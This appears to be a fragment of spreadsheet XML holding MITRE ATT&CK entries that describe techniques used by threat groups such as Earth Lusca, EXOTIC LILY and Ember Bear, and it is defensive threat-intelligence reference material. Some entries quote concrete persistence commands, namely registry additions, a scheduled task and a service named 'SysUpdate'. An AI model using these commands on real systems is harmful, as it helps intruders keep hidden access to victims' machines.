    <t>relationship--cbf49a08-de8a-483a-9732-230f9cc93002</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has used malicious documents containing exploits for CVE-2021-40444 affecting Microsoft MSHTML.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>relationship--4f195e59-5f23-45d9-b48e-d0d0a0152b72</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has gained execution through victims clicking on malicious LNK files contained within ISO files, which can execute hidden DLLs within the ISO.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--736856d1-3ae3-4135-9dd4-7dfa6b55715b</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has used malicious links to lure users into executing malicious payloads.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>relationship--988fda8d-8374-4ff7-b70c-f2a654442808</t>
  </si>
  <si>
    <t>19 August 2022</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has searched for information on targeted individuals on business databases including RocketReach and CrunchBase.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>relationship--a42c4b1f-e145-4bf2-bd5e-fe65ff3e1a24</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has used contact forms on victim websites to generate phishing e-mails.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>relationship--93450717-845e-4cd8-b1ac-3a842251a331</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has copied data from social media sites to impersonate targeted individuals.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>relationship--c854c48c-f9b0-4e41-904d-df7fe6700e7f</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has established social media profiles to mimic employees of targeted companies.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>relationship--4269e5cb-b2ad-4757-b0b0-bfd5e8b7dc38</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) conducted an e-mail thread-hijacking campaign with malicious ISO attachments.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)</t>
  </si>
  <si>
    <t>relationship--4ae86603-3199-4692-b37c-f26a7c7e3fc2</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has relied on victims to open malicious links in e-mails for execution.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>relationship--6f23e808-aa3b-4ad8-b932-e294c8921fdb</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has used the e-mail notification features of legitimate file sharing services for spearphishing.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>relationship--25527270-616e-4c53-a85a-03fc0b1e9a96</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011)  has uploaded malicious payloads to file-sharing services including TransferNow, TransferXL, WeTransfer, and OneDrive.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>relationship--db393f5e-8029-423c-bfbc-da48fc932cb0</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has used file-sharing services including WeTransfer, TransferNow, and OneDrive to deliver payloads.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>relationship--9094f15c-c60c-4366-8c1b-22f21e1156b8</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used WinRAR to compress stolen files into an archive prior to exfiltration.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--d0a3d891-2555-45eb-8aaf-99b86372607b</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used the Fodhelper UAC bypass technique to gain elevated privileges.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--a57c1d9d-0d2f-4206-a53f-d31ab7c53c17</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used a &lt;code&gt;DCSync&lt;/code&gt; command with [Mimikatz](https://attack.mitre.org/software/S0002) to retrieve credentials from an exploited controller.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--14c209b9-cef8-4acf-8deb-57c03beaa64f</t>
  </si>
  <si>
    <t xml:space="preserve">[Earth Lusca](https://attack.mitre.org/groups/G1006) has placed a malicious payload in `%WINDIR%\SYSTEM32\oci.dll` so it would be sideloaded by the MSDTC service.(Citation: TrendMicro EarthLusca 2022) </t>
  </si>
  <si>
    <t>relationship--7807639f-cc9f-4b0a-9f01-8161cbb1fd53</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used [certutil](https://attack.mitre.org/software/S0160) to decode a string into a cabinet file.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--52a5b303-b759-424e-86b8-5c855976e5ea</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Nltest](https://attack.mitre.org/software/S0359) to obtain information about domain controllers.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--a38efb2d-3014-4196-b936-326a9a65ee83</t>
  </si>
  <si>
    <t>02 September 2022</t>
  </si>
  <si>
    <t xml:space="preserve">[Earth Lusca](https://attack.mitre.org/groups/G1006) has registered domains, intended to look like legitimate target domains, that have been used in watering hole attacks.(Citation: TrendMicro EarthLusca 2022) </t>
  </si>
  <si>
    <t>relationship--5ce84367-05cc-446e-a744-08a46f103552</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has performed watering hole attacks.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--29a1fc8a-58c3-4465-b170-d9ec7c2d4d22</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used the megacmd tool to upload stolen files from a victim network to MEGA.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--a44ba3c3-406a-49cf-9d7b-9ee7f09f9ae4</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has compromised victims by directly exploiting vulnerabilities of public-facing servers, including those associated with Microsoft Exchange and Oracle GlassFish.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--b8012238-cfd9-4c5b-8759-8d86f0d6f933</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Mimikatz](https://attack.mitre.org/software/S0002) to exploit a domain controller via the ZeroLogon exploit (CVE-2020-1472).(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--495db551-b69c-482e-b242-831011c054f7</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has manipulated legitimate websites to inject malicious JavaScript code as part of their watering hole operations.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--4504384f-f832-4ec2-87b0-b8dfc2208083</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used ProcDump to obtain the hashes of credentials by dumping the memory of the LSASS process.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--9d82c2c5-7d98-40dd-9171-1d605f259064</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) required users to click on a malicious file for the loader to activate.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--b71bc667-b3e8-4482-ba74-118049872be4</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006)  has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--fff3195c-ef40-4e11-b0f3-f1a849b2b316</t>
  </si>
  <si>
    <t>21 July 2022</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired and used a variety of malware, including [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--e607a77e-5c5c-4f3e-a62d-82124a434911</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</si>
  <si>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</si>
  <si>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relationship--4feaa82b-a356-4412-be2b-daa6ea6df82c</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) modified the registry using the command &lt;code&gt;reg add “HKEY_CURRENT_USER\Environment” /v UserInitMprLogonScript /t REG_SZ /d “[file path]”&lt;/code&gt; for persistence.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--83aedf08-e8eb-4c18-80c1-727ddb0f1d07</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used `mshta.exe` to load an HTA script within a malicious .LNK file.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--a3627d9d-1c78-4b10-8b1c-3183a939862b</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) used Base64 to encode strings.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--c74dfd33-e17a-4fc7-b2bd-154499fc3ac2</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used PowerShell to execute commands.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--6e2b1acc-87b5-4947-a933-b376d48b126a</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has added the Registry key `HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\UDPrint” /v Driver /d “spool.dll /f` to load malware as a Print Processor.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--6a779cbf-ef5c-4018-a91f-10889b2068b0</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Tasklist](https://attack.mitre.org/software/S0057) to obtain information from a compromised host.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--6ef89fa5-cd74-499b-bbc0-3b0d83baeba1</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) adopted Cloudflare as a proxy for compromised servers.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--bee75401-9e24-4c5d-9203-0b3cdca01cbf</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) used Python scripts for port scanning or building reverse shells.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--6e6f9a76-23b6-4474-abc1-3d477284c220</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</si>
  <si>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</si>
  <si>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relationship--2bb7ed69-8f59-47f3-8d86-f1c1202c7629</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has dropped an SSH-authorized key in the `/root/.ssh` folder in order to access a compromised server with SSH.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--1307fdab-a09c-4d48-a917-a76ba0113098</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) used the command &lt;code&gt;schtasks /Create /SC ONLOgon /TN WindowsUpdateCheck /TR “[file path]” /ru system&lt;/code&gt; for persistence.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--6f1c0538-c9f4-49ad-b934-0714b50c1c45</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired multiple servers for some of their operations, using each server for a different role.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--dd033098-eb56-4c17-90d7-c7673f04bcd6</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used compromised web servers as part of their operational infrastructure.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--ff6f4b5b-1b5f-4f8f-9307-345a3c278151</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has sent spearphishing emails to potential targets that contained a malicious link.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--cff64310-fe63-44ad-9791-d1b4b50f0229</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has used steganography to hide shellcode in a BMP image file.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--09f5abff-ad09-4d5b-a6c4-612d4171c089</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) used the command &lt;code&gt;ipconfig&lt;/code&gt; to obtain information about network configurations.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--e13ab711-012c-4405-87ae-f096d770e367</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</si>
  <si>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</si>
  <si>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relationship--def0dc1a-1c41-44f0-a076-36fb1b98390c</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) collected information on user accounts via the &lt;code&gt;whoami&lt;/code&gt; command.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--5fc9189b-7c9b-43f7-8d60-96a1f497e395</t>
  </si>
  <si>
    <t>relationship--aae6444e-c9e5-4965-9499-8aa6d546b58e</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired and used a variety of open source tools.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--a8fef3c0-796a-4995-81fe-c47336c3ddbd</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has staged malware and malicious files on compromised web servers, GitHub, and Google Drive.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--0e837480-f359-4bdc-875a-d953027d17b0</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) used VBA scripts.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--245ced0a-5a53-44bd-a4db-07451f752b14</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has scanned for vulnerabilities in the public-facing servers of their targets.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--e0e8cd30-04d6-457c-b4c1-34145f182dad</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has established GitHub accounts to host their malware.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--0167e4ad-b828-4813-88bf-f5b03b4d3268</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) has compromised Google Drive repositories.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--2dc666e3-b715-425c-b8b4-f3c0f7d6d8e9</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) used a VBA script to execute WMI.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--85216e27-5d58-4d89-8b04-3ef50ed14f95</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) created a service using the command &lt;code&gt;sc create “SysUpdate” binpath= “cmd /c start “[file path]””&amp;&amp;sc config “SysUpdate” start= auto&amp;&amp;net
start SysUpdate&lt;/code&gt; for persistence.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--cd85a2d6-ebee-4ebd-9571-5cafcac15b05</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</si>
  <si>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</si>
  <si>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relationship--91b22928-d538-4460-a5ff-7a0a5e797430</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) has used exploitation of endpoint software, including Microsoft Internet Explorer Adobe Flash vulnerabilities, to gain execution. They have also used zero-day exploits.(Citation: Symantec Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>relationship--e1269d18-6cc9-45cc-9c99-06f765bea366</t>
  </si>
  <si>
    <t>The Ritsol backdoor trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) can download files onto a compromised host from a remote location.(Citation: Symantec Ristol May 2012)</t>
  </si>
  <si>
    <t>relationship--f0ef3f47-5651-4638-a007-cb585d3174b0</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) has leveraged multiple types of spearphishing in order to attempt to get a user to open attachments.(Citation: Symantec Elderwood Sept 2012)(Citation: CSM Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>relationship--1262d88d-0eb1-4d19-b84a-9793ef3e4d03</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) has leveraged multiple types of spearphishing in order to attempt to get a user to open links.(Citation: Symantec Elderwood Sept 2012)(Citation: CSM Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>relationship--89672463-a201-43c7-a24a-1e6d7a1a188a</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) has encrypted documents and malicious executables.(Citation: Symantec Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>relationship--0c81e49d-53be-4fba-9a07-ec2fe5501267</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) has packed malware payloads before delivery to victims.(Citation: Symantec Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>relationship--f8c27264-e42d-48fd-9a18-4b275383f155</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) has delivered zero-day exploits and malware to victims via targeted emails containing malicious attachments.(Citation: Symantec Elderwood Sept 2012)(Citation: CSM Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>relationship--537d027b-0559-4d1a-8f28-a918d3d23e63</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server.(Citation: Symantec Elderwood Sept 2012)(Citation: CSM Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>relationship--2003aaad-7b87-461d-b17f-b19100069ad9</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has added extra spaces between JavaScript code characters to increase the overall file size.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--cbf047ee-8c01-497b-9695-aaab0450f6dd</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has used stolen certificates from Electrum Technologies GmbH to sign payloads.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--630e409c-c874-465c-bbb1-6b7778e2939b</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has stolen legitimate certificates to sign malicious payloads.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--2d2849f2-b34a-455f-a5c7-b4b42920f36a</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has obfuscated malicious scripts to help avoid detection.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--e59cb442-495d-4687-a0e7-3255aa89ae66</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has used control panel files (CPL), delivered via e-mail, for execution.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--593e12bb-dcef-4773-a80d-274c10095d12</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has executed a batch script designed to disable Windows Defender on a compromised host.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--4ef40df7-c32f-41a7-94d8-1c06e8e6b21f</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has exploited Microsoft Office vulnerability CVE-2017-11882.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--5b5f3ef5-7295-4bc7-b35c-f629ecfc9c2e</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has used tools to download malicious code.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--9cf8e459-479b-423f-a54f-42ed6b37aaf2</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has used JavaScript to execute malicious code on a victim's machine.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--9e6ca313-671b-4157-89f5-377d81c1355d</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has attempted to lure victims into executing malicious files.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--f16f493f-d002-4013-80e6-c6ec96a7b913</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has attempted to lure users to click on a malicious link within a spearphishing email.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--f98aa77a-8a46-417d-b4dc-f7c635702cea</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has used an open source batch script to modify Windows Defender registry keys.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--3932fe52-ec80-4462-8598-a94a31918c43</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has obfuscated malware to help avoid detection.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--612656af-ca71-420c-b013-d1f01c5091a1</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has used PowerShell to download and execute malicious code.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--4f3efbf7-46f8-4e93-97cd-c5a497457e0f</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has packed malware to help avoid detection.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--79bc2141-efac-4b6e-b53b-bb364393f1d5</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</si>
  <si>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</si>
  <si>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relationship--030638ac-8aee-4c3d-9f2a-c6037ab2f5b9</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has sent spearphishing emails containing malicious links.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--d3c37666-b2f7-43c3-b89b-7ce48184269e</t>
  </si>
  <si>
    <t xml:space="preserve">[Ember Bear](https://attack.mitre.org/groups/G1003) has obtained and used open source scripts from GitHub.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) </t>
  </si>
  <si>
    <t>relationship--2a7bd59d-7905-44ae-9134-1601e636f73f</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) has used Discord's content delivery network (CDN) to deliver malware and malicious scripts to a compromised host.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--a02d2ae6-bdeb-4fa0-b1b9-5a0de2b03b6a</t>
  </si>
  <si>
    <t>[Ember Bear](https://attack.mitre.org/groups/G1003) had used `cmd.exe` and Windows Script Host (wscript) to execute malicious code.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--d75dcb5a-4997-4d2f-b1ba-815ebae54478</t>
  </si>
  <si>
    <t>G0020</t>
  </si>
  <si>
    <t>Equation</t>
  </si>
  <si>
    <t>intrusion-set--96e239be-ad99-49eb-b127-3007b8c1bec9</t>
  </si>
  <si>
    <t xml:space="preserve">[Equation](https://attack.mitre.org/groups/G0020) is known to have the capability to overwrite the firmware on hard drives from some manufacturers.(Citation: Kaspersky Equation QA) </t>
  </si>
  <si>
    <t>relationship--41d59812-ad44-46f4-89d9-51a9b080a772</t>
  </si>
  <si>
    <t>[Equation](https://attack.mitre.org/groups/G0020) has been observed utilizing environmental keying in payload delivery.(Citation: Kaspersky Gauss Whitepaper)(Citation: Kaspersky Equation QA)</t>
  </si>
  <si>
    <t>relationship--3d661b40-6ebf-470f-a675-142f86b6c649</t>
  </si>
  <si>
    <t>[Equation](https://attack.mitre.org/groups/G0020) has used an encrypted virtual file system stored in the Windows Registry.(Citation: Kaspersky Equation QA)</t>
  </si>
  <si>
    <t>relationship--00caa57d-7b0f-4156-907e-18d14d62965a</t>
  </si>
  <si>
    <t>[Equation](https://attack.mitre.org/groups/G0020) has used tools with the functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware.(Citation: Kaspersky Equation QA)</t>
  </si>
  <si>
    <t>relationship--062ebca3-abf7-449a-ad84-f04a3cada4dd</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) has used PowerShell to bypass UAC.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>relationship--497c12c8-1cdf-4c1e-9624-83438ef770a2</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) can collect email credentials from victims.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>relationship--8b914660-657e-4f6e-a9be-ed51c840875e</t>
  </si>
  <si>
    <t xml:space="preserve">[Evilnum](https://attack.mitre.org/groups/G0120) has used the malware variant, TerraTV, to load a malicious DLL placed in the TeamViewer directory, instead of the original Windows DLL located in a system folder.(Citation: ESET EvilNum July 2020) </t>
  </si>
  <si>
    <t>relationship--67f7ebd0-effb-4169-a184-7d45c614a6ee</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) has deleted files used during infection.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>relationship--65ce8ea7-b997-4bb3-8fb4-9259567f492b</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) can deploy additional components or tools as needed.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>relationship--acdab071-f314-4671-a794-3c792b559c28</t>
  </si>
  <si>
    <t>28 January 2021</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) has used malicious JavaScript files on the victim's machine.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>relationship--ea3b16db-6b34-4171-9dec-7ce618f49dee</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) has sent spearphishing emails designed to trick the recipient into opening malicious shortcut links which downloads a .LNK file.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>relationship--6c0ae1dc-2429-42fd-899e-8aafb9adc50c</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has used the malware variant, TerraTV, to run a legitimate TeamViewer application to connect to compromrised machines.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>relationship--2a5341b9-e987-4687-b8f2-6c798f1ac0ae</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) has sent spearphishing emails containing a link to a zip file hosted on Google Drive.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>relationship--478e4f65-d03a-4f1b-aeeb-16dddc1bfead</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) can steal cookies and session information from browsers.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>relationship--3fd05c59-c28b-418a-be56-87ff52d4771c</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) has used a component called TerraLoader to check certain hardware and file information to detect sandboxed environments. (Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>relationship--1646da26-9846-4a24-b9a6-59ebad8c9cb5</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has used batch scripts and scheduled tasks to delete critical system files.(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>relationship--059f8b03-59f9-45da-9c12-862f50e5fe45</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>relationship--33c8fb30-3515-4582-ad29-34fa0d7e15e5</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) has moved laterally using the Local Administrator account.(Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>relationship--5e56eeb2-9ca5-496d-9348-8e337af5f0d8</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) uses PowerShell for execution as well as PowerShell Empire to establish persistence.(Citation: FireEye FIN10 June 2017)(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>relationship--a5888362-00f3-4c9e-98ee-048aee5169e1</t>
  </si>
  <si>
    <t>09 April 2021</t>
  </si>
  <si>
